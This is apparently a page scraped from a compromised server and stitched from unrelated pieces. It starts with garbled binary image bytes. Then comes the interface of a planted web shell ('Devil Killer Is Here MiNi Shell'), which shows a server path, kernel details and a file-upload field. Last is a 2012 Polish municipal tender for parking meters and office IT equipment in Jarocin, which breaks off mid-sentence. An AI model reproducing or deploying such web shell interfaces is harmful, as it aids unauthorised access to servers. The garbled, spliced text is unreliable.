JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/82339-N-2012.html

<p class="kh_header"><b>Jarocin: Dostawa, montaż, uruchomienie i serwis urządzeń poboru opłat za postój w mieście Jarocin</b><br>
<b>Numer ogłoszenia: 82339 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 62 7499500, faks 62 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż, uruchomienie i serwis urządzeń poboru opłat za postój w mieście Jarocin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, montaż, uruchomienie i serwis gwarancyjny oraz bieżąca eksploatacja w okresie gwarancji 16 szt. urządzeń poboru opłat na drogach publicznych w mieście Jarocin w wyznaczonej strefie, w której dopuszcza się pobierania opłat za parkowanie samochodów, wraz z wyposażeniem dodatkowym tj.
1. Sprzęt komputerowy z oprogramowaniem dla biura strefy parkowania:
a)	2 x Stacja robocza:
-	Procesor Core i7 min 3.00 GHz, min 8 MB cache,
-	Karta graficzna min 512 MB Złącza: 2x DVI-I dual link, PCIe x l6; 
-	1 x eSATA Interface
-	1 x Gbit Ethernet LAN
-	1x RS-232
-	Min 5 x USB
-	MultiCard Reader 20inl USB 2.0 3.5 internal USB interface, Formats: CF I, CF II, IBM MD, SM, SD, Mini SD, Micro SD, SD HC, MMC, RS-MMC, MMC micro, MMC mobile, MS, MS Pro, MS Duo, MS Pro Duo, MS Micro, xD-Picture Card, 
xD-Picture Card M type, xD-Picture Card H type
-	2 x 4 GB DDR3-1333 module PC 1333, DIMM
-	CD/DVD +/- RW SuperMulti SATA 
-	HDD SATA III 500GB 7.2k 3.5 (wewnętrzny) 
-	Obudowa Mini Tower
-	Zasilacz 230V AC 300 W
-	Klawiatura USB
-	Mysz laserowa USB + podkładka
-	Gwarancja 36 miesięcy

b)	Oprogramowanie dla stacji roboczej:
-  Windows 7 Professional PL 64bit wraz z nośnikiem pozwalającym na ponowną instalację   
   systemu  
-  Nero 9 Essentials XL 
-  Office 2010 Professional PL
-  Program anty wirusowy (36 miesięcy aktualizacji)
-  Oprogramowanie klienckie do obsługi automatów parkingowych
-  Oprogramowanie klienckie do ładowania kart
-  Oprogramowanie do egzekucji wezwań

c)	Monitory:
-  3 x 22 podświetlanie LED, złącze DVI + VGA, możliwość montażu na ścianie
-  Gwarancja 36 miesięcy

d)	Drukarka:
- Laserowa Monochromatyczna, port Ethernet, port USB 2.0, format wydruku A4, 
     rozdzielczość 1200 x 1200 dpi, druk dwustronny automatyczny, dodatkowy toner 1 szt.

e)	Notebook:
-	Procesor Core i5 min 2.4GHz, min 3MB cache
-	Min 4 GB DDR3 1333 MHz PC3-10600
-	Dual Channel DDR3 1333MHz PC10600 RAM (2 DIMM slots)
-	HDD SATA 250 GB 5.4k lub wyższy 
-	Zintegrowana karta graficzna i audio
-	1 x Express Card 54/34
-	1 x Smart Card reader, SD Card reader,
-	Integrated Touchpad with Gesture support,
-	LED-Status display, connector for Kensington Lock,
-	Interfaces: l x VGA, lx Displayport lub HDMI, min 3 x USB 2.0 
-	1 x E-SATA/USB combo, RJ45, RJ11 optional, l x audio in, l x audio out, l x serial  
(RS-232), l x złącze do stacji dokującej
-	IEEE 802.11 a/b/g/n
-	Hard Disk Recovery (obraz zapasowy systemu na dysku)
-	Zasilacz 230VAC
-	Mysz laserowa USB + podkładka
-	Ekran min 15 HD podświetlanie LED
-	Napęd optyczny Blu-ray read/write + DVD read/write + CD read/write z  
oprogramowaniem do odtwarzania
-	Gwarancja 36 miesięcy

f)	Oprogramowanie dla notebook:
-	Windows 7 Professional PL 64bit 
-	Nero 9 Essentials XL
-	Office 2010 Professional PL
-	Oprogramowanie klienckie do obsługi automatów parkingowych 
-	Oprogramowanie do konfiguracji automatów parkingowych 
-	Program do egzekucji wezwań
-	Program anty wirusowy (36 miesięcy aktualizacji)

g)	Serwer:
-	Procesor Xeon min 2.00 GHz, min 4 MB cache
-	RAID Ctrl SAS 6G 5/6 512MB - RAID levels 0, 1, 10, 5, 50, 6 und 60+ moduł bateryjny BBU
-	zintegrowana garta graficzna
-	4 x HD SATA 3G 500GB 7.2K HOT PLUG 2.5
-	3 x 4 GB DDR3 1333 MHz PC3-10600 ECC
-	2 x Gbit Ethernet LAN
-	Min 4 x USB zewnętrzne + 1 x wewnętrzne
-	Obudowa Tower / Midi Tower
-	2 hot plug PSU 450W (2 x zasilacz)
-	6 x zatoka dla napędu 2.5 hot plug SATA/SAS/SSD (wymiana w trakcie pracy systemu), połączone z kontrolerem 8 portowym RAID
-    monitoring temperatury system i CPU
-    płyta główna z przewodem cieplnym
-    6 x gniazdo pamięci DDR 3
-    CD/DVD +/- RW Super Multi
-    iRMC S2 na płycie - serwer zarządzający z zintegrowanym kontrolerem grafiki i kartą  
     Ethernet 10/100MBit (Service LAN port)
-    min 3 slots PCI/PCIe 
-    Klawiatura USB
-    Mysz laserowa USB + podkładka
-    Gwarancja 3 lata - reakcja następnym dniu roboczym w miejscu instalacji

h)	Oprogramowanie Serwera:
-	1 x Win Srw 2008 R2 SP1 Standard w/5CAL z Hyper-V (lub inny hypervisor) wraz 
z nośnikiem pozwalającym na ponowną instalację systemu
-	1 x Aplikacja serwer SQL
-	1 x Program anty wirusowy (36 miesięcy aktualizacji)
-	1 x Aplikacja serwera obsługi automatów z oprogramowaniem dla transmisji danych Ethernet z automatami oraz GSM
-	Nero 9 Essentials XL 

i)	Sieć:
-	Switch 24 x , 10/100/1000 MBit port zarządzalny (VLAN, STP) (mini 2 x SFP)
-	Router 2xWAN + 4xLAN - obsługa VPN, QuickVPN itp.
-	Wszelkie niezbędne kable patchcord RJ45
-     Wszelkie niezbędne kable i listwy zasilające
-	Modem GSM USB - dla wysyłania SMS + zasilacz
-	UPS 1.5kVA / 1.2kW port Ethernet
-	2 x UPS 750kVA / 1.2kW port USB (dla stacji roboczej)

2.	300 szt. kart elektronicznych wielokrotnego ładowania o nominale 50 zł. z chipem nadrukiem ( wzór nadruku ustali Zamawiający).
3.	2 szt. ładowarek do kart elektronicznych.
4.	2 szt. przenośnych terminali dla kontrolerów z drukarkami.
5.	1 szt. urządzenie do laminowania kart abonamentowych.
6.	3 kasety monetowe - rezerwowe.
7.	3 akumulatory - rezerwowe.


Urządzenie do poboru opłat - musi spełniać następujące wymagania techniczno-eksploatacyjne:
1)	Fabrycznie  nowe  urządzenie  do pobierania opłat parkingowych   odpornymi na włamanie za pomocą wytrychów i wiercenia. 
2)	Urządzenie musi być wykonane ze stali nierdzewnej (grubość minimum 2 mm), kwasoodpornej odpornej na korozję lub z materiałów nie ulegających korozji przez min. 6  lat.  
3)	Kolor  niebieski.  
Konstrukcja urządzenia i zastosowane materiały muszą zapewniać odpowiednią odporność na uszkodzenia mechaniczne (wandalizm). Urządzenie musi pracować niezawodnie w zakresie temperatur od  -20 stopni Celsjusza  do +55 stopni Celsjusza  przy wilgotności względnej do 95 %. 
4)	Parkomat powinien posiadać nie mniej niż jeden przedział  odbioru   na  bilety i  zwrot.
5)	Działanie urządzenia  parkingowego   zgodne    ze  standardem  PN-  EN 12414: 2002.
6)	Urządzenie powinno być zasilane autonomicznym układem złożonym z baterii słonecznej  Moc baterii słonecznej oraz pojemność akumulatora  powinna być dobrana w taki sposób aby zapewnić nieprzerwane działanie urządzenia w okresie co najmniej  5  miesięcy. Bateria słoneczna odporna na uszkodzenia mechaniczne oraz warunki atmosferyczne, łatwa do czyszczenia.
7)	Sygnalizacja poprzez GSM/GPRS (do centrum sterowania) zbyt niskiego poziomu zasilania i odpowiednie zabezpieczenia przed wykasowaniem danych z pamięci wewnętrznej w każdym wypadku zaniku zasilania.
8)	Odpowiednie do wyglądu obudowy oznakowanie informujące o możliwości zakupu  biletów parkingowych uzgodnione z zamawiającym. Obudowa urządzenia pomalowana farbą odporną  na graffiti. Pomocna dla użytkowników instrukcja obsługi według projektu wykonawcy zaakceptowana przez Zamawiającego.
Zamawiający wymaga, by na wyświetlaczu/wyświetlaczach  pojawiały się  informacje   dotyczące:
- sprawności urządzenia (czynny / nieczynny/, płatny tylko kartą lub monetami w razie   
-   uszkodzenia jednego z elementów),
- aktualnego czasu (zegar),  
- aktualnej daty
 - wysokość opłaty (taryfa),
- lokalizacji  urządzenia.
9)	Powyższe informacje powinny dać się uzyskać na wyświetlaczu/ wyświetlaczach w co najmniej trzech dowolnie programowanych językach (polski, angielski, niemiecki), które w każdej chwili można zmieniać. Wyboru języka innego niż polski ma dokonywać użytkownik poprzez użycie określonego przycisku.
Łatwa dostępność dla użytkowników przez bezpośrednie przyporządkowanie objaśnień tekstowych i graficznych do poszczególnych przycisków obsługowych. Możliwości przerwania transakcji i zwrot opłaty bez wydania biletu.
Wyświetlacz (lub wyświetlacze) wykonane z materiału odpornego na uszkodzenia oraz łatwego do konserwacji. Na wyświetlaczu (wyświetlaczach) muszą  pojawić się wszystkie komunikaty (uzgodnione z zamawiającym / w języku polskim / z polskimi czcionkami).   
Sprzedaż biletów parkingowych za gotówkę (bilon) oraz bezgotówkowe uiszczanie  wpłat  za pomocą   karty  chipowej  bez możliwości wydawania reszty  przez urządzenie do pobierania opłat parkingowych. Zamawiający wymaga, by opłata za parkowanie była wnoszona z góry. Przy skróceniu czasu parkowania zamawiający nie przewiduje zwrotu należności. 
Na wydanym bilecie parkingowym muszą znajdować się następujące informacje: dane identyfikujące urządzenie do pobierania opłaty parkingowej (ulica, nr urządzenia, strefa cenowa), data, godzina i minuta wydania oraz upływu ważności biletu, kolejny numer biletu, wysokość wniesionej opłaty, bilet powinien posiadać kod unikatowy lub inne zabezpieczenie przed  fałszowaniem, inne informacje uzgodnione z zamawiającym, 
Urządzenie  powinno  wydrukować  bilet  w  czasie  nie dłuższym   niż   5 sek.  od momentu  zaakceptowania  transakcji  przez   użytkownika.  Wymiary   biletu:  długość  min. 65  mm. Szerokość min  55 mm. Długość  rolki  z  papierem  powinna  wynosić  min.  350 m tj.  ok. 4500 biletów. Na  bilecie  powinna  być  możliwość  wydruku  znaków  graficznych  (logo  bezpośrednio z  drukarki).
Urządzenie  powinno  posiadać  możliwość  sprawdzenia   przez   serwis  żetonem  lub kartą  serwisową  i  wydruku  biletu  serwisowego  z  zaznaczeniem na  bilecie rodzaju biletu i  formy  płatności ( żeton  lub  karta ).
Obsługa  urządzenia za  pomocą  przycisków  piezoelektrycznych . Użytkownik   powinien mieć  możliwość  przerwania  transakcji  w  dowolnym  momencie. 
Otwór   wrzutowy na  monety   powinien  być zabezpieczony  blokadą   która  otwiera  się  tylko  pod wpływem  zbliżenia  monety. 
10)	Dodatkowo  w  przypadku  zatkania  otworu  wrzutowego  automat  powinien  informować  na  wyświetlaczu (wyświetlaczach)  o  możliwości  zapłaty   kartą   lub niesprawności   urządzenia.  W  przypadku  zatkania  otworu  wrzutowego  urządzenie powinno  mieć   mechanizm    automatycznie  oczyszczający   otwór  wrzutowy.
11)	Drukarka termiczna, określenie temperaturowe od -20 C do + 55 C.Po wydrukowaniu  biletu.
12)	Sygnalizacja serwisowa dotycząca braku papieru jak również innych usterek przekazywana do centrum sterowania.
13)	Elektroniczny kontroler autentyczności monet (dopuszczalny błąd poniżej 1 %, - weryfikacja będzie dokonywana na podstawie 50 monet) z programowalną blokadą otworu wrzutowego z dowolnym programowaniem. Powyżej dopuszczalnego błędu wymagane jest  ponowne ustawienie na koszt wykonawcy. 
14)	Czytnik  monet  powinien  mieć  możliwość   obsługi   różnych  rodzajów  monet w  tym monety  testowej.  przeznaczonej  dla  serwisu i pozwalającej  na   wydrukowanie  biletu testowego.
15)	Czytnik monet  powinien  obsługiwać monety 10gr. 20gr 50gr. 1 zł. 2 zł i 5 zł  
z  możliwością  zaprogramowania  monet  EUR.
16)	Czytnik  kart  chipowych.
17)	Samozamykająca się zabezpieczona część kasowa na monety o pojemności  od  4 do 6 litrów.
18)	Opróżnienie części kasowej winno automatycznie uruchamiać drukowanie raportu danych statystycznych na drukarce urządzenia z numeracją kolejną umożliwiającą identyfikację urządzenia. Uruchomić drukowanie raportu zawierającego nr raportu, nr urządzenia, ulicę , datę, godzinę stan kasy - bilon,  liczbę i rodzaje monet oraz te same dane dotyczących płatności kartą . Wszystkie dane muszą być przekazane elektronicznie poprzez  GSM/GPRS do centrum sterowania. Dodatkowo  wymagany  jest wymienna kaseta na monety zabezpieczona zamkiem dwustopniowym.
19)	Selektywny wybór  meldunków  serwisowych   pod wskazany numer  telefonu  np. biuro i ochrona.
20)	Transmisja danych  poprzez  GSM/GPRS.
21)	 Aplikacja kliencka, realizująca dostęp do danych gromadzonych w bazie danych SQL w  Centrum  Zarządzania i Przetwarzania Danych powinna  pobierać  dane z serwera poprzez bezpieczne połączenie
22)	Zainstalowanie oprogramowania, konfiguracja sprzętu komputerowego, a także zestawienie bezpiecznego połączenia między parkomatem, a Centrum Zarządzania i Przetwarzania Danych leży po stronie Wykonawcy. 
23)	Zbieranie i przekazywanie   wszystkich  danych  elektronicznie poprzez  GSM/GPRS  do BSPP. Wpływy finansowe: wartość sprzedanych biletów w okresie poprzedzającym opróżnienie części kasowej lub poprzedzającym odczyt(w rozbiciu na dni - 5 opróżnień części kasowej), wartości opłat wniesionych  monetami i kartami stykowymi / bezstykowymi, wartość monet znajdujących  się w części kasowej. 
24)	Wymagany monitoring wpływów finansowych do urządzenia poboru opłat;
- informacja  o  transakcjach   dokonanych  w  parkomacie, 
- informacja  o  ilości  sprzedanych   biletów  w  zależności  od  ich  wartości.
25)	Statystyka parkowania: liczba biletów opłaconych monetami, liczba biletów opłaconych kartami, liczba biletów zakupionych na określony czas parkowania, generowanie  wykresów  ilości  sprzedaży  biletów  w  zależności  od  pory  dnia.
26)	Monitorowanie pracy urządzenia: data i godzina wystąpienia awarii, data i godzina usunięcia awarii, rodzaj awarii, czas niesprawności. Wymagany monitoring sprawności urządzenia, generowanie   wykresu  stanu  naładowania  akumulatora.  
27)	 Informacja o procentowym napełnieniu części kasowej od 75 %.

Oprogramowanie  monitorujące:
1)	Powinno  posiadać   mapę  miasta zaznaczoną lokalizacją  poszczególnych  urządzeń  parkingowych z  sygnalizacją  kolorami stanu technicznego   i  kasowego  urządzenia (informacja  o konieczności wyjęcia   kasetki   z bilonem). 
2)	Łączność GSM/ GPRS  powinna  być  dwustronna  tzn. urządzenia parkingowe   łączą  się  z biurem   i  w  każdej  chwili  można się  połączyć z  biura  z dowolnym urządzeniem parkingowym.
3)	Automatyczna zmiana czasu z letniego na zimowy i odwrotnie.
4)	Zaprogramowania obowiązującego cennika opłat i napisów informacyjnych w dniu odbioru oraz świąt stałych i ruchomych  przez wykonawcę. Zapewnienie automatycznego przestawiania (przestawianie zdalne przez komputer centralny i GSMGPRS).
5)	Dowolnie programowana zmiana wysokości opłat do wyboru:
a)	 bezpośrednio z  urządzenia przenośnego przy urządzeniu do pobierania opłat          parkingowych lub  karty chipowej,
b)	 przez sterowanie drogą GSM/GPRS z centrum sterowania do urządzenia do pobierania opłat parkingowych.
6)	Łatwo wymienialne przez przeszkolonego pracownika zamawiającego etykiety z   informacjami o stawkach opłat parkingowych i instrukcje obsług zabezpieczone przejrzystym ekranem z tworzywa sztucznego według projektu zamawiającego.

Wszystkie w/w urządzenia muszą być fabrycznie nowe.  
Dostawę, montaż i uruchomienie urządzeń poboru opłat oraz urządzeń dodatkowych będących wyposażeniem Biura Strefy Płatnego Parkowania wraz z oprogramowaniem 
i próbnym rozruchem należy wykonać do dnia 30.06.2012 r.

Dodatkowo Wykonawca zobowiązany jest przeprowadzić szkolenie pracowników Zamawiającego w stopniu umożliwiającym prowadzenie biura strefy płatnego parkowania wraz z obsługą parkomatów.

Serwis gwarancyjny i bieżącej eksploatacji wszystkich dostarczonych urządzeń należy prowadzić przez cały okres gwarancji, która ustala się na 36 miesięcy licząc od dnia rozpoczęcia pobierania opłat za pomocą tych urządzeń tj. od dnia 01.07.2012 r.

W przypadku gdy dokumentacja bądź inne dokumenty zawierają nazwę producenta danego wyrobu, materiału itp. - Zamawiający w każdym przypadku dopuszcza możliwość zastosowania produktów, materiałów itp. równoważnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.73.00.00-1, 51.21.40.00-5, 45.26.22.10-6, 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie minimum 2 dostawy po 15 parkomatów współpracujących z centrum kontroli i monitoringu poprzez GSM lub GPRS</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. 2010, Nr 113, poz. 759 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy 
w stosunku do treści oferty w następujących przypadkach:
